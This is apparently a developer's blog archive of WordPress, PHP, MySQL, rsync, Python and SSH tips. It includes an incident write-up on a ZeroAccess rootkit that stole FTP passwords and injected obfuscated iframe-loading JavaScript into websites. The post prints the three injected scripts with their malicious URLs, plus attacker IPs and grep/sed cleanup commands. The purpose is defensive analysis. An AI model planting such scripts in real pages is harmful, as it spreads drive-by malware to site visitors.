PHP misreporting the existence of directories or files

Recently I was working on a WordPress site where I was deleting a network. When the network was deleted, the root site was also deleted (or vice versa), and when the root site was deleted, it removed its own media directory as well as the parent network’s media directory. This worked out OK in most cases (because the root site and root network are one and the same in a multisite network). However, in some of my workplace’s custom code, we hooked into both network and site deletion and tried to delete some extra folders attached to the network and site. Some folders were shared, so once they were deleted they should have shown up as missing. Instead, on the second pass the folders were reported as still existing, and deleting them threw errors. So…

PHP has something called the stat cache to make file operations faster. It caches information any time you call functions like “stat(), lstat(), file_exists(), is_writable(), is_readable(), is_executable(), is_file(), is_dir(), is_link(), filectime(), fileatime(), filemtime(), fileinode(), filegroup(), fileowner(), filesize(), filetype(), and fileperms().” Consequently, PHP was misreporting the existence of files and folders that were clearly deleted, while glob() confirmed they were gone. In the end, we had to add calls to clearstatcache() to avoid this trap.

I wish there were a way to disable stat caching for a session, because calling this function before every check gets to be a pain.
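
For anyone hitting the same trap, here is a minimal sketch of the workaround pattern (the function name and path are made up for illustration, not our actual code): clear the stat cache right before any existence check that has to be accurate.

// Hypothetical cleanup callback fired on site/network deletion.
function my_cleanup_media_dir( $site_id ) {
	$dir = WP_CONTENT_DIR . '/uploads/sites/' . $site_id; // example path

	// An earlier deletion hook may already have removed this directory,
	// but the stat cache can still report it as present. Clear it first.
	clearstatcache(); // clearstatcache( true, $dir ) also works on PHP 5.3+

	if ( is_dir( $dir ) ) {
		// Remove any remaining files, then the directory itself.
		foreach ( glob( $dir . '/*' ) ?: array() as $file ) {
			if ( is_file( $file ) ) {
				unlink( $file );
			}
		}
		rmdir( $dir );
	}
}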

Things learned from WordCamp 2012

I attended most of the developer-track presentations at Boston’s WordCamp 2012. I learned about some interesting tools and techniques that I’d like to document for myself and others.

Optimizing for Speed by Ben Metcalfe

  1. YouGetSignal’s Reverse IP Lookup – Shows you how many other hosts live on the same IP address. This can be helpful for anyone on shared hosting or a VPS.
  2. Debug Bar – Get debugging information from each WordPress page load.
  3. Google XML Sitemaps – Delete this plugin if you have it. (I had it.)
  4. YSlow – Get load times and optimization tips for a page request.

WordPress as a Web Framework by Sam Hotchkiss

  1. MVC frameworks for WordPress
    1. WP MVC – Provides a singleton object and eliminates the metadata bottleneck by providing tables indexed by post IDs.
    2. Tina MVC
  2. _s Theme – Use Automattic’s blank starter theme as a good starting point.

Automating frontend workflow by Aaron Jorbin (blog post, slides)

  1. Autojump – Jump to frequently used directories
  2. Commander.js (nodejs) – Script working with CLI
  3. watch (nodejs) – Watch files/dirs
  4. mockjax – Fake your Ajax calls (good for prototyping or testing unrelated yet dependent functionality)
  5. Travis CI – continuous integration service (WordPress plugin tests)
  6. Glue – generate CSS sprites

Microdata for SEO by Dave Ross

  1. Add itemprop, itemscope, etc. to any identifiable schema (see the sketch after this list)
  2. Google Rich Snippets Tool – Test your microdata
  3. Examples: the SiteNavigationElement type for navigation, the Blog type for blog posts, etc.
  4. Some quick tidbits: Bing rates sites with microdata higher than sites without, and Google uses the microdata in search results
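
As a quick illustration (a sketch, not code from the talk), a theme template fragment that marks up a nav menu with schema.org microdata might look like this:

<nav itemscope itemtype="http://schema.org/SiteNavigationElement">
	<ul>
		<li><a itemprop="url" href="<?php echo esc_url( home_url( '/' ) ); ?>"><span itemprop="name">Home</span></a></li>
		<li><a itemprop="url" href="<?php echo esc_url( home_url( '/blog/' ) ); ?>"><span itemprop="name">Blog</span></a></li>
	</ul>
</nav>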

Enterprise WordPress by Jake Goldman (1up)

  1. Sites to show clients: showcase, WordPress VIP
  2. Maintaining a beautiful WordPress admin

Shortcodes by Jon Bishop

  1. Use oEmbed rather than plugins to embed media from sites like YouTube, Facebook, etc. (see the sketch below)
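
For instance (a sketch with a placeholder URL, not code from the talk), WordPress auto-embeds a supported URL placed on its own line in post content, and you can also fetch the markup directly:

// oEmbed sketch: fetch the embed HTML for a URL (placeholder shown).
$html = wp_oembed_get( 'http://www.youtube.com/watch?v=VIDEO_ID' );
if ( $html ) {
	echo $html; // the embed markup returned for that URL
}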

Codex by Erick Hitter

  1. Use sanitize_* functions when saving to the DB: sanitize_text_field(), sanitize_title()
  2. Use esc_* functions when showing data to the user (esc_url_raw() is the exception; unlike esc_url(), it is meant for saving and redirects rather than display); see the sketch after this list
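
Here is that split in a minimal sketch (the option and field names are made up): sanitize on the way into the database, escape on the way out to the browser.

// Saving: sanitize untrusted input before it hits the database.
$title = sanitize_text_field( $_POST['my_title'] );   // hypothetical form field
update_option( 'my_plugin_title', $title );           // hypothetical option

// Displaying: escape at output time, for the context it is printed in.
echo '<h2>' . esc_html( get_option( 'my_plugin_title' ) ) . '</h2>';
echo '<a href="' . esc_url( get_option( 'my_plugin_link' ) ) . '">Link</a>';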

JavaScript hooks by Luke Gedeon (1up)

  1. JavaScript custom events are coming; they will provide functionality similar to WordPress’ action and filter hooks (list of hooks). See the sketch below for the PHP side of that analogy.
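
For reference, a minimal sketch of the PHP side of that analogy (the hook names here are made up):

// An action: run code at a named point.
add_action( 'my_plugin_loaded', 'my_plugin_setup' );   // hypothetical hook
function my_plugin_setup() {
	// ... initialization ...
}
do_action( 'my_plugin_loaded' );

// A filter: let other code modify a value before it is used.
add_filter( 'my_plugin_title', 'strtoupper' );
$title = apply_filters( 'my_plugin_title', 'hello world' ); // "HELLO WORLD"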

SMF2 Gallery2 Integration Problem

I have an SMF2 forum site, where the gallery is implemented through Gallery2 using Oldiesmann’s SMF + G2 Integration Project.

For two years, SMF and Gallery worked properly together with linked member groups (a mod option), so that SMF member groups auto-synchronized with the ones in Gallery. At some point, either with a Gallery or an SMF upgrade, users reported that the Gallery part of the site threw cryptic security warnings for non-admins. I explored the issue and figured out that users were missing from two required groups, “Everybody” and “Registered Users”. I reported it to Oldiesmann, but he claimed he had no control over those required groups and that Gallery was self-managing them.

After about a year, I delved into the code and found that, in order to sync a user’s SMF groups with their Gallery groups, the integration code was removing all of the user’s Gallery groups and then re-adding only the shared ones. This of course meant that the user was also being removed from the required groups “Everybody” and “Registered Users”. Users with privileged groups did not see the problem.

Here’s the fix, which I’ve also submitted to Oldiesmann. His forum complained when I added the code (it says it does not allow external links, haha), so I had to create this post here.

My fix ensures that we do not remove the user from the required groups and also adds the user back into them (if necessary). Please note that the cleanup code is necessary because anyone who has ever visited the buggy gallery will have had those groups removed, so there’s a lot of cleanup to do. The code provided below should auto-correct this issue.


commit 97075cd4e20d2807011b38cd293ccc38c728db9a
Author: Inderpreet Singh <inderpreet99gmail>
Date:   Sat Jul 28 10:33:40 2012 -0500

    PJ fix for SMF Gallery2 Integration:
    Avoid g2 required groups: Everybody and Registered Users groups from getting removed
    Add user to the required groups (cleanup our mess)

diff --git a/Sources/Gallery.php b/Sources/Gallery.php
index 74652fe..c289678 100755
--- a/Sources/Gallery.php
+++ b/Sources/Gallery.php
@@ -1348,10 +1348,32 @@ function groupCheck()
 	}
 	else
 	{
+
+		// Avoid g2 required groups: Everybody and Registered Users groups from getting removed!
+		$groupstoignore = array('Everybody', 'Registered Users');
+		$groupstoadd = $groupstoignore;
+		foreach($galgroups as $gid => $gname)
+		{
+			if(in_array($gname, $groupstoignore))
+			{
+				unset($galgroups[$gid]);
+				$groupstoadd = array_diff($groupstoadd, array($gname));
+			}
+		}
+		
+		// Add user to the required groups (cleanup our mess)
+		foreach($groupstoadd as $gname) {
+			list($ret, $group) = GalleryCoreApi::fetchGroupByGroupName($gname);
+			if($ret)
+			{
+				fatal_error($ret->getAsText(), 'gallery');
+			}
+			GalleryCoreApi::addUserToGroup($context['user']['g2_uid'], $group->getId());
+		}
+
 		// array_diff will give us an array of all the values in $galgroups that aren't in $galsmfgroups
 		// $galgroups uses the group IDs as the keys, and the group names as the values. We only want the group IDs...
 		$groupstoremove = array_diff(array_keys($galgroups), $galsmfgroups);
-
 		// Remove them from any group(s) they no longer belong to
 		if(count($groupstoremove) > 0)
 		{

WordPress: How to programmatically remove categories returned by get_the_category_list function?

First of all, I would recommend using the wp_list_categories function (which supports ‘exclude’ and ‘exclude_tree’ arguments) instead of get_the_category_list.
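
For example (a sketch; the category IDs are placeholders for your own), the simpler route looks like this:

// Exclude specific category IDs (e.g. 1 = Uncategorized) from the list.
wp_list_categories( array(
	'exclude'  => '1,7',   // hypothetical IDs: Uncategorized and a "Feature" category
	'title_li' => '',      // drop the default "Categories" list title
) );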

Sometimes we do not have the option of choosing which function to use. It is also unfortunate that get_the_category_list() does not provide a hook to target each category in the list, so we have to use a hacky method to remove items. The following code hooks the ‘the_category’ filter and uses a regex to parse the string returned by get_the_category_list() (a list of HTML elements joined by a separator), removing the appropriate categories.

I would also like to note that the code below removes the “Uncategorized” category (which is the default category and the most common offender users want to remove) and also the “Feature” category (something I was using in my own code).

/**
 * Identifies the "Uncategorized", "Feature" link
 * preg_replace_callback for bu_library_hide_uncategorized function
 * 
 * @param array $regex_parts
 * @return string 
 */
function bu_library_hide_uncategorized_callback($regex_parts) {
	// Bail out, returning the full match untouched, if we did not get the expected match + capture group
	if( !$regex_parts or count((array)$regex_parts) != 2)
		return isset($regex_parts[0]) ? $regex_parts[0] : '';
	
	if ( in_array($regex_parts[1], array('Uncategorized', 'Feature')) )
		return '';
	
	return $regex_parts[0];
}

/**
 * Removes the uncategorized category from $thelist string parameter
 * 
 * Ignores wp-admin requests. Unfortunately, the 'the_category' filter is used in other places with 1 argument, so we must
 * make the last 2 arguments optional (or we get PHP warnings) and quit when the 2nd argument is not supplied.
 */
function bu_library_hide_uncategorized($thelist, $separator = '', $parents = '') {
	
	// short circuit for lists that do not have uncategorized category,
	// or when this function is called from wp-admin (i.e. missing separator)
	if(is_admin() or !$separator or stripos($thelist, 'Uncategorized') === false) return $thelist;
	
	$listitems = explode($separator, $thelist);
	
	$new_listitems = array();
	foreach($listitems as $item) {
		if ($new_item = preg_replace_callback('!<\s*a[^>]*>(.*?)<\s*/a[^>]*>!im', 'bu_library_hide_uncategorized_callback', $item)) {
			$new_listitems[] = $new_item;
		}
	}
	
	$thelist = implode($separator, $new_listitems);
	return $thelist;
}
add_filter('the_category', 'bu_library_hide_uncategorized', 10, 3);

mysqldump and .my.cnf tip to avoid “ignoring option ‘–databases'” error

Don’t you hate how the mysqldump command keeps reading .my.cnf and outputting the following warning/error:
mysqldump: ignoring option '--databases' due to invalid value 'dbname'

It’s been reported as a bug to the MySQL devs, but they keep saying it is by design and working as intended. Here’s how you should structure your .my.cnf to avoid it:


[client]
user=user1
password=pw1
[mysql]
database=dbname

This way “mysqldump dbname” doesn’t return that hideous error message (only the mysql client reads the [mysql] section), and “mysql dbname” also works like a charm.

rsyncd tips for TomatoUSB/DD-WRT

I wanted to build a NAS with rsyncd on a TomatoUSB router (equipped with ipkg and a USB hard drive connected). I also wanted this NAS to be available from outside the network, and I found that the instructions online were incomplete. If you’re having problems with it, please follow these two tips:

  1. rsync cannot connect to rsyncd from within the network. This is the default setup that everyone wants, so it should just work. The problem is that the command everyone tells us to use with rsyncd modules/profiles (rsyncd.conf: [profilename]) is wrong, even in the DD-WRT tutorial. It is missing a second colon, so the command should be:
    rsync file.ext user@server::profilename/optional/path

    (Notice how module/profile names need two colons.)

  2. rsyncd is not accessible from outside the network. I haven’t seen instructions for this anywhere. To fix it, you must do two things:
    • Add a rule to the Port Forwarding section of the UI: forward TCP port 873 (the default rsyncd port) to 192.168.1.1 (the router IP/gateway).
    • Run the following command, which adds a rule to the iptables firewall, inside Scripts > Firewall, or run it on the command line for a quick test (but it will disappear once you restart the router):
      iptables -A INPUT -j ACCEPT -p tcp --dport 873
    • For OpenWRT routers, one would either use uci or add the above rule to /etc/storage/post_iptables_script.sh and do mtd_storage.sh save.

Command line python script to get context lines on a search string

grep’s -B and -A flags don’t work when grep is used on the command line with readline support, so I created this little script that does work on the command line. Use the -h flag to learn the options. Here’s how I’ve used it:

ls -al | ./printcontext.py -b 1 -a 1 -d test.txt

This finds the test.txt entry and prints it along with the entries immediately before and after it.


#!/usr/bin/python
# print context when using a python script with readline support (command line piping)
# by inderpreetsingh.com

import sys, re
from optparse import OptionParser

def main():
    usage = "usage: %prog [options] needle"
    parser = OptionParser(usage)
    parser.add_option("-b", "--before", type="int", dest="before", default=0,
            help='Before context lines (a la grep)')
    parser.add_option("-a", "--after", type="int", dest="after", default=0,
            help='After context lines')
    parser.add_option("-d", "--debug", action="store_true", dest="debug", default=False,
            help='Debug information.')

    #Not implemented
    #parser.add_option("-o", "--output", type="string", dest="output")
    
    (options, args) = parser.parse_args()
    
    if len(args) != 1:
        parser.error("Specify what you want to search")
    
    needle = args[0]
    if options.debug:
        print "\nNeedle: %s\nBefore context lines: %s\nAfter context lines: %s\n" % (needle, options.before, options.after)
    

    lines = sys.stdin.readlines()
    lines = [x.strip() for x in lines]
    
    lastline = ''
    i = 0
    for line in lines:
        if needle in line:
#        if re.search(needle, line):
            first = max(0, i - options.before)
            last = min(len(lines), i + options.after + 1)
            
            if options.debug:
                print "Found '%s' on line %d, printing line %d to %d" % (needle, i, first, last)
                
            for println in lines[first:last]:
                print println
            print ""
        lastline = line
        i += 1

if __name__ == "__main__":
    main()

Rootkit hacked Win7, stole ftp passwords, and spread malware

What happened:
Over the past weekend, I got hit by the ZeroAccess rootkit, which I’d recently heard about making the news on a few security-related sites. It disabled Microsoft Security Essentials and Windows Defender, and took over the Windows Security Center. It further controls the network layer so that it can block any connections to security sites. To keep itself in control, it installs itself as a service, a startup item, and several scheduled tasks. It kills your exe associations at each restart (which means you can’t run any executables, including the tools you’d use to remove the damned trojans/viruses). While all this is happening, it keeps installing more malware.

Internet help:
BleepingComputer (particularly the FixNCR.reg file, which is very helpful in restoring the exe file association) and their forums
Malwarebytes Anti-Malware didn’t help me much, because this rootkit and its malware friends kept coming back. (The problem is that these rootkits modify memory on the fly, so whatever success you think you have is misleading.)

How I got rid of it:
In safe mode, I ran Kaspersky Virus Removal Tool 2011, TDSSKiller, and ComboFix.
(Restore executable file associations by using the FixNCR.reg tool I listed above)
Once the above three fixed the issue, I used MBAM, MS Security Essentials, Spyware Doctor (not free) and SuperAntiSpyware (with Full Scans) to verify that my computer was clean.

Stolen ftp passwords:
The rootkit scans for FTP programs such as FileZilla, which, like other FTP clients, stores all your passwords in plaintext for any random person to grab. Lesson learned: use passphrase-protected SSH keys to prevent this problem in the future. It sent all of these passwords back to the attackers’ database, and the attackers (log below) then connected to each site, recursively looked for the common files (index.htm, index.html, index.php, login.php, auth.html, etc.) and inserted the following code (usually at the end):

  1. Code:
    <script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

    evaluates to

    <iframe width="1" height="1" frameborder="0" src="http://zirycatum.com/k985ytv.htm"></iframe>
  2. Code:
    <script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.';rl='85y';r='umu';eh='m/';ec='htt';sb='rc';f='ame';l='://';b=yn.concat(f);gg=xm.concat(sb);qt=ec.concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document.createElement(b);xp.setAttribute('width','1');xp.setAttribute('height','1');xp.frameBorder=0;xp.setAttribute(gg,qt);document.body.appendChild(xp);</script>

    evaluates to

    <iframe width="1" height="1" frameborder="0" src="http://numudozaf.com/k985ytv.htm"></iframe>
  3. Code:
    <script>mv='uf';jx='tv.';cg='me';k='e';mg='rc';g='ys';rs='m';f='of';m='ht';u='85y';ca='e.c';r='s';j='fra';i='ht';h='//h';qy='wob';v='k9';a='t';qt='i';br='p:';s='om/';ul=qt.concat(j,cg);xl=r.concat(mg);xp=m.concat(a,br,h,g,f,mv,k,qy,ca,s,v,u,jx,i,rs);var bn=document.createElement(ul);bn.setAttribute('width','1');bn.setAttribute('height','1');bn.frameBorder=0;bn.setAttribute(xl,xp);document.body.appendChild(bn);</script>

    evaluates to

    <iframe width="1" height="1" frameborder="0" src="http://hysofufewobe.com/k985ytv.htm"></iframe>

    How to find and remove these exploits:
    Find:

    find . -type f -regex ".*\(py\|php\|html?\)$" -exec grep -lr "frameBorder.*setAttribute.*document.body.appendChild" {} 2> /dev/null \;

    Explanation:
    Find all files, recursively from the current directory, that have py/php/htm/html as the extension, and look for the three keywords (“frameBorder”, “setAttribute”, then “document.body.appendChild”) in order.
    Notes: You should make sure this command outputs the filenames of files that actually contain the exploit HTML code. You might need to change the keywords (if the virus code has changed). Also, “2> /dev/null” hides all permission/access errors; take it out if you want to see errors for files you don’t have access to.

    Replace (just adds sed, the stream editor, to do the editing):

    find . -type f -regex ".*\(py\|php\|html?\)$" -exec grep -lr "frameBorder.*setAttribute.*document.body.appendChild" {} 2> /dev/null \; | xargs -I {} sed -i.hacked 's#<script>wa=.*</script>##g' {}

    Explanation of the command after the pipe (|):
    For each file found by the previous command, edit it so that we remove everything from the opening script tag to the closing script tag, but only if “wa=” follows the opening script tag. Of course, you will need to run this command again, replacing “wa=” with “ti=” (like the other pasted exploit codes above, or whatever else the exploit is currently using). This will also back up each exploited file (with the extension .hacked), just in case you lose something important.

    How to prevent future FTP edits:
    Don’t use FTP programs that store plaintext passwords, or better yet use passphrase-protected SSH keys (with an SSH agent to simplify your life).

    Google StopBadware
    StopBadware.org is a service that comes with all the popular browsers (Firefox, Chrome, Safari). Every time you visit a site, this service is used to check whether the page/website is listed as one that propagates badware. So, as you can imagine, all the exploited files (above) resulted in all of the domains getting blacklisted in these browsers, and on top of that Google Search displays a “This site is harmful” message. Firefox’s implementation of this service is the worst, because Firefox tries its hardest to make you stop visiting the site. Most likely your site will get flagged by the Googlebot, and you will also get an email from Google titled “Malware notification regarding victimsite.com” sent to the common webmaster email addresses: abuse@victimsite.com, admin@victimsite.com, webmaster@victimsite.com, etc. (so, as a good practice, you should make sure one of these addresses works).
    To fix this, you will need to add your site to Google Webmaster Tools (a really helpful tool for all sorts of webmaster activities) and then “Request a Review” from the Diagnostics > Malware section. This is just one way; I think you can also request a review through stopbadware.org (the original vendor), but the request will probably still go through the original reporter (most likely Google). Some requests are resolved within a day (for popular sites), and some take as long as two days. I’ve also noticed that a convincing argument about the security overhaul you did, made in the comment when asking for a review, helps your case.

    Finally, some IP addresses and an example of what it looks like in the logs:

    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "LIST /folderthis/folderthat/" 226 1862
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "TYPE I" 200 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "PASV" 227 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "SIZE index.htm" 213 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "RETR index.htm" 226 2573
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "TYPE I" 200 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "PASV" 227 -
    204.12.252.138 UNKNOWN u47973886 [14/Aug/2011:23:19:27 -0500] "STOR index.htm" 226 3018

    2nd server:
    Aug 14 08:58:41 customer proftpd[6367]: (::ffff:218.93.122.165[::ffff:218.93.122.165]) - FTP session opened.
    Aug 14 23:37:04 customer proftpd[16356]: (::ffff:117.41.182.209[::ffff:117.41.182.209]) - FTP session closed.
    Aug 15 00:20:34 customer proftpd[22467]: (::ffff:62.212.66.15[::ffff:62.212.66.15]) - FTP session opened.
    Aug 15 09:12:04 customer proftpd[8899]: (::ffff:204.12.252.138[::ffff:204.12.252.138]) - FTP session closed.
    Aug 15 17:09:20 customer proftpd[25532]: (::ffff:178.17.165.146[::ffff:178.17.165.146]) - FTP
    Aug 15 23:42:16 customer proftpd[10474]: (::ffff:95.211.14.25[::ffff:95.211.14.25]) - FTP session closed.
    Aug 16 02:22:53 customer proftpd[17143]: (::ffff:119.128.168.56[::ffff:119.128.168.56]) - FTP session opened.
    Aug 16 03:51:34 customer proftpd[20771]: (::ffff:111.74.239.55[::ffff:111.74.239.55]) - FTP session closed.
    Aug 16 23:32:22 customer proftpd[3396]: (::ffff:61.131.51.193[::ffff:61.131.51.193]) - FTP session opened.

SSH private/public key auth not working

Problem: I can’t set up an automated login (passwordless with ssh agent) to one of my servers.

Tip: The best way to debug SSH problems is to run ssh -vvvv server. The extra verbosity flags will tell you exactly what is going on at each step.

Details:
I was receiving the following output:
debug1: Trying private key: /Users/inderpreetsingh/.ssh/id_rsa
debug1: PEM_read_PrivateKey failed
debug1: read PEM private key done: type
debug3: Not a RSA1 key file /Users/inderpreetsingh/.ssh/id_rsa.
debug1: read PEM private key done: type RSA
Identity added: /Users/inderpreetsingh/.ssh/id_rsa (/Users/inderpreetsingh/.ssh/id_rsa)
debug1: read PEM private key done: type RSA
debug3: sign_and_send_pubkey
debug2: we sent a publickey packet, wait for reply
debug1: Authentications that can continue: publickey,password,hostbased

debug1: Trying private key: /Users/inderpreetsingh/.ssh/id_dsa
debug3: no such identity: /Users/inderpreetsingh/.ssh/id_dsa
debug2: we did not send a packet, disable method

debug3: authmethod_lookup password
debug3: remaining preferred: ,password
debug3: authmethod_is_enabled password
debug1: Next authentication method: password
inderpreetsingh@server's password:

Analysis: The errors are misleading. They seem to indicate that the identity file on our own machine is the culprit, but the real problem was the permissions on the server’s .ssh directory and authorized_keys file. They may be too lax or too restrictive.

Fix: From your home directory on the server, set the following permissions:

chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys

And for good measure, make sure you alone own the files:

chown username:username ~/.ssh
chown username:username ~/.ssh/authorized_keys

And passwordless SSH here I come.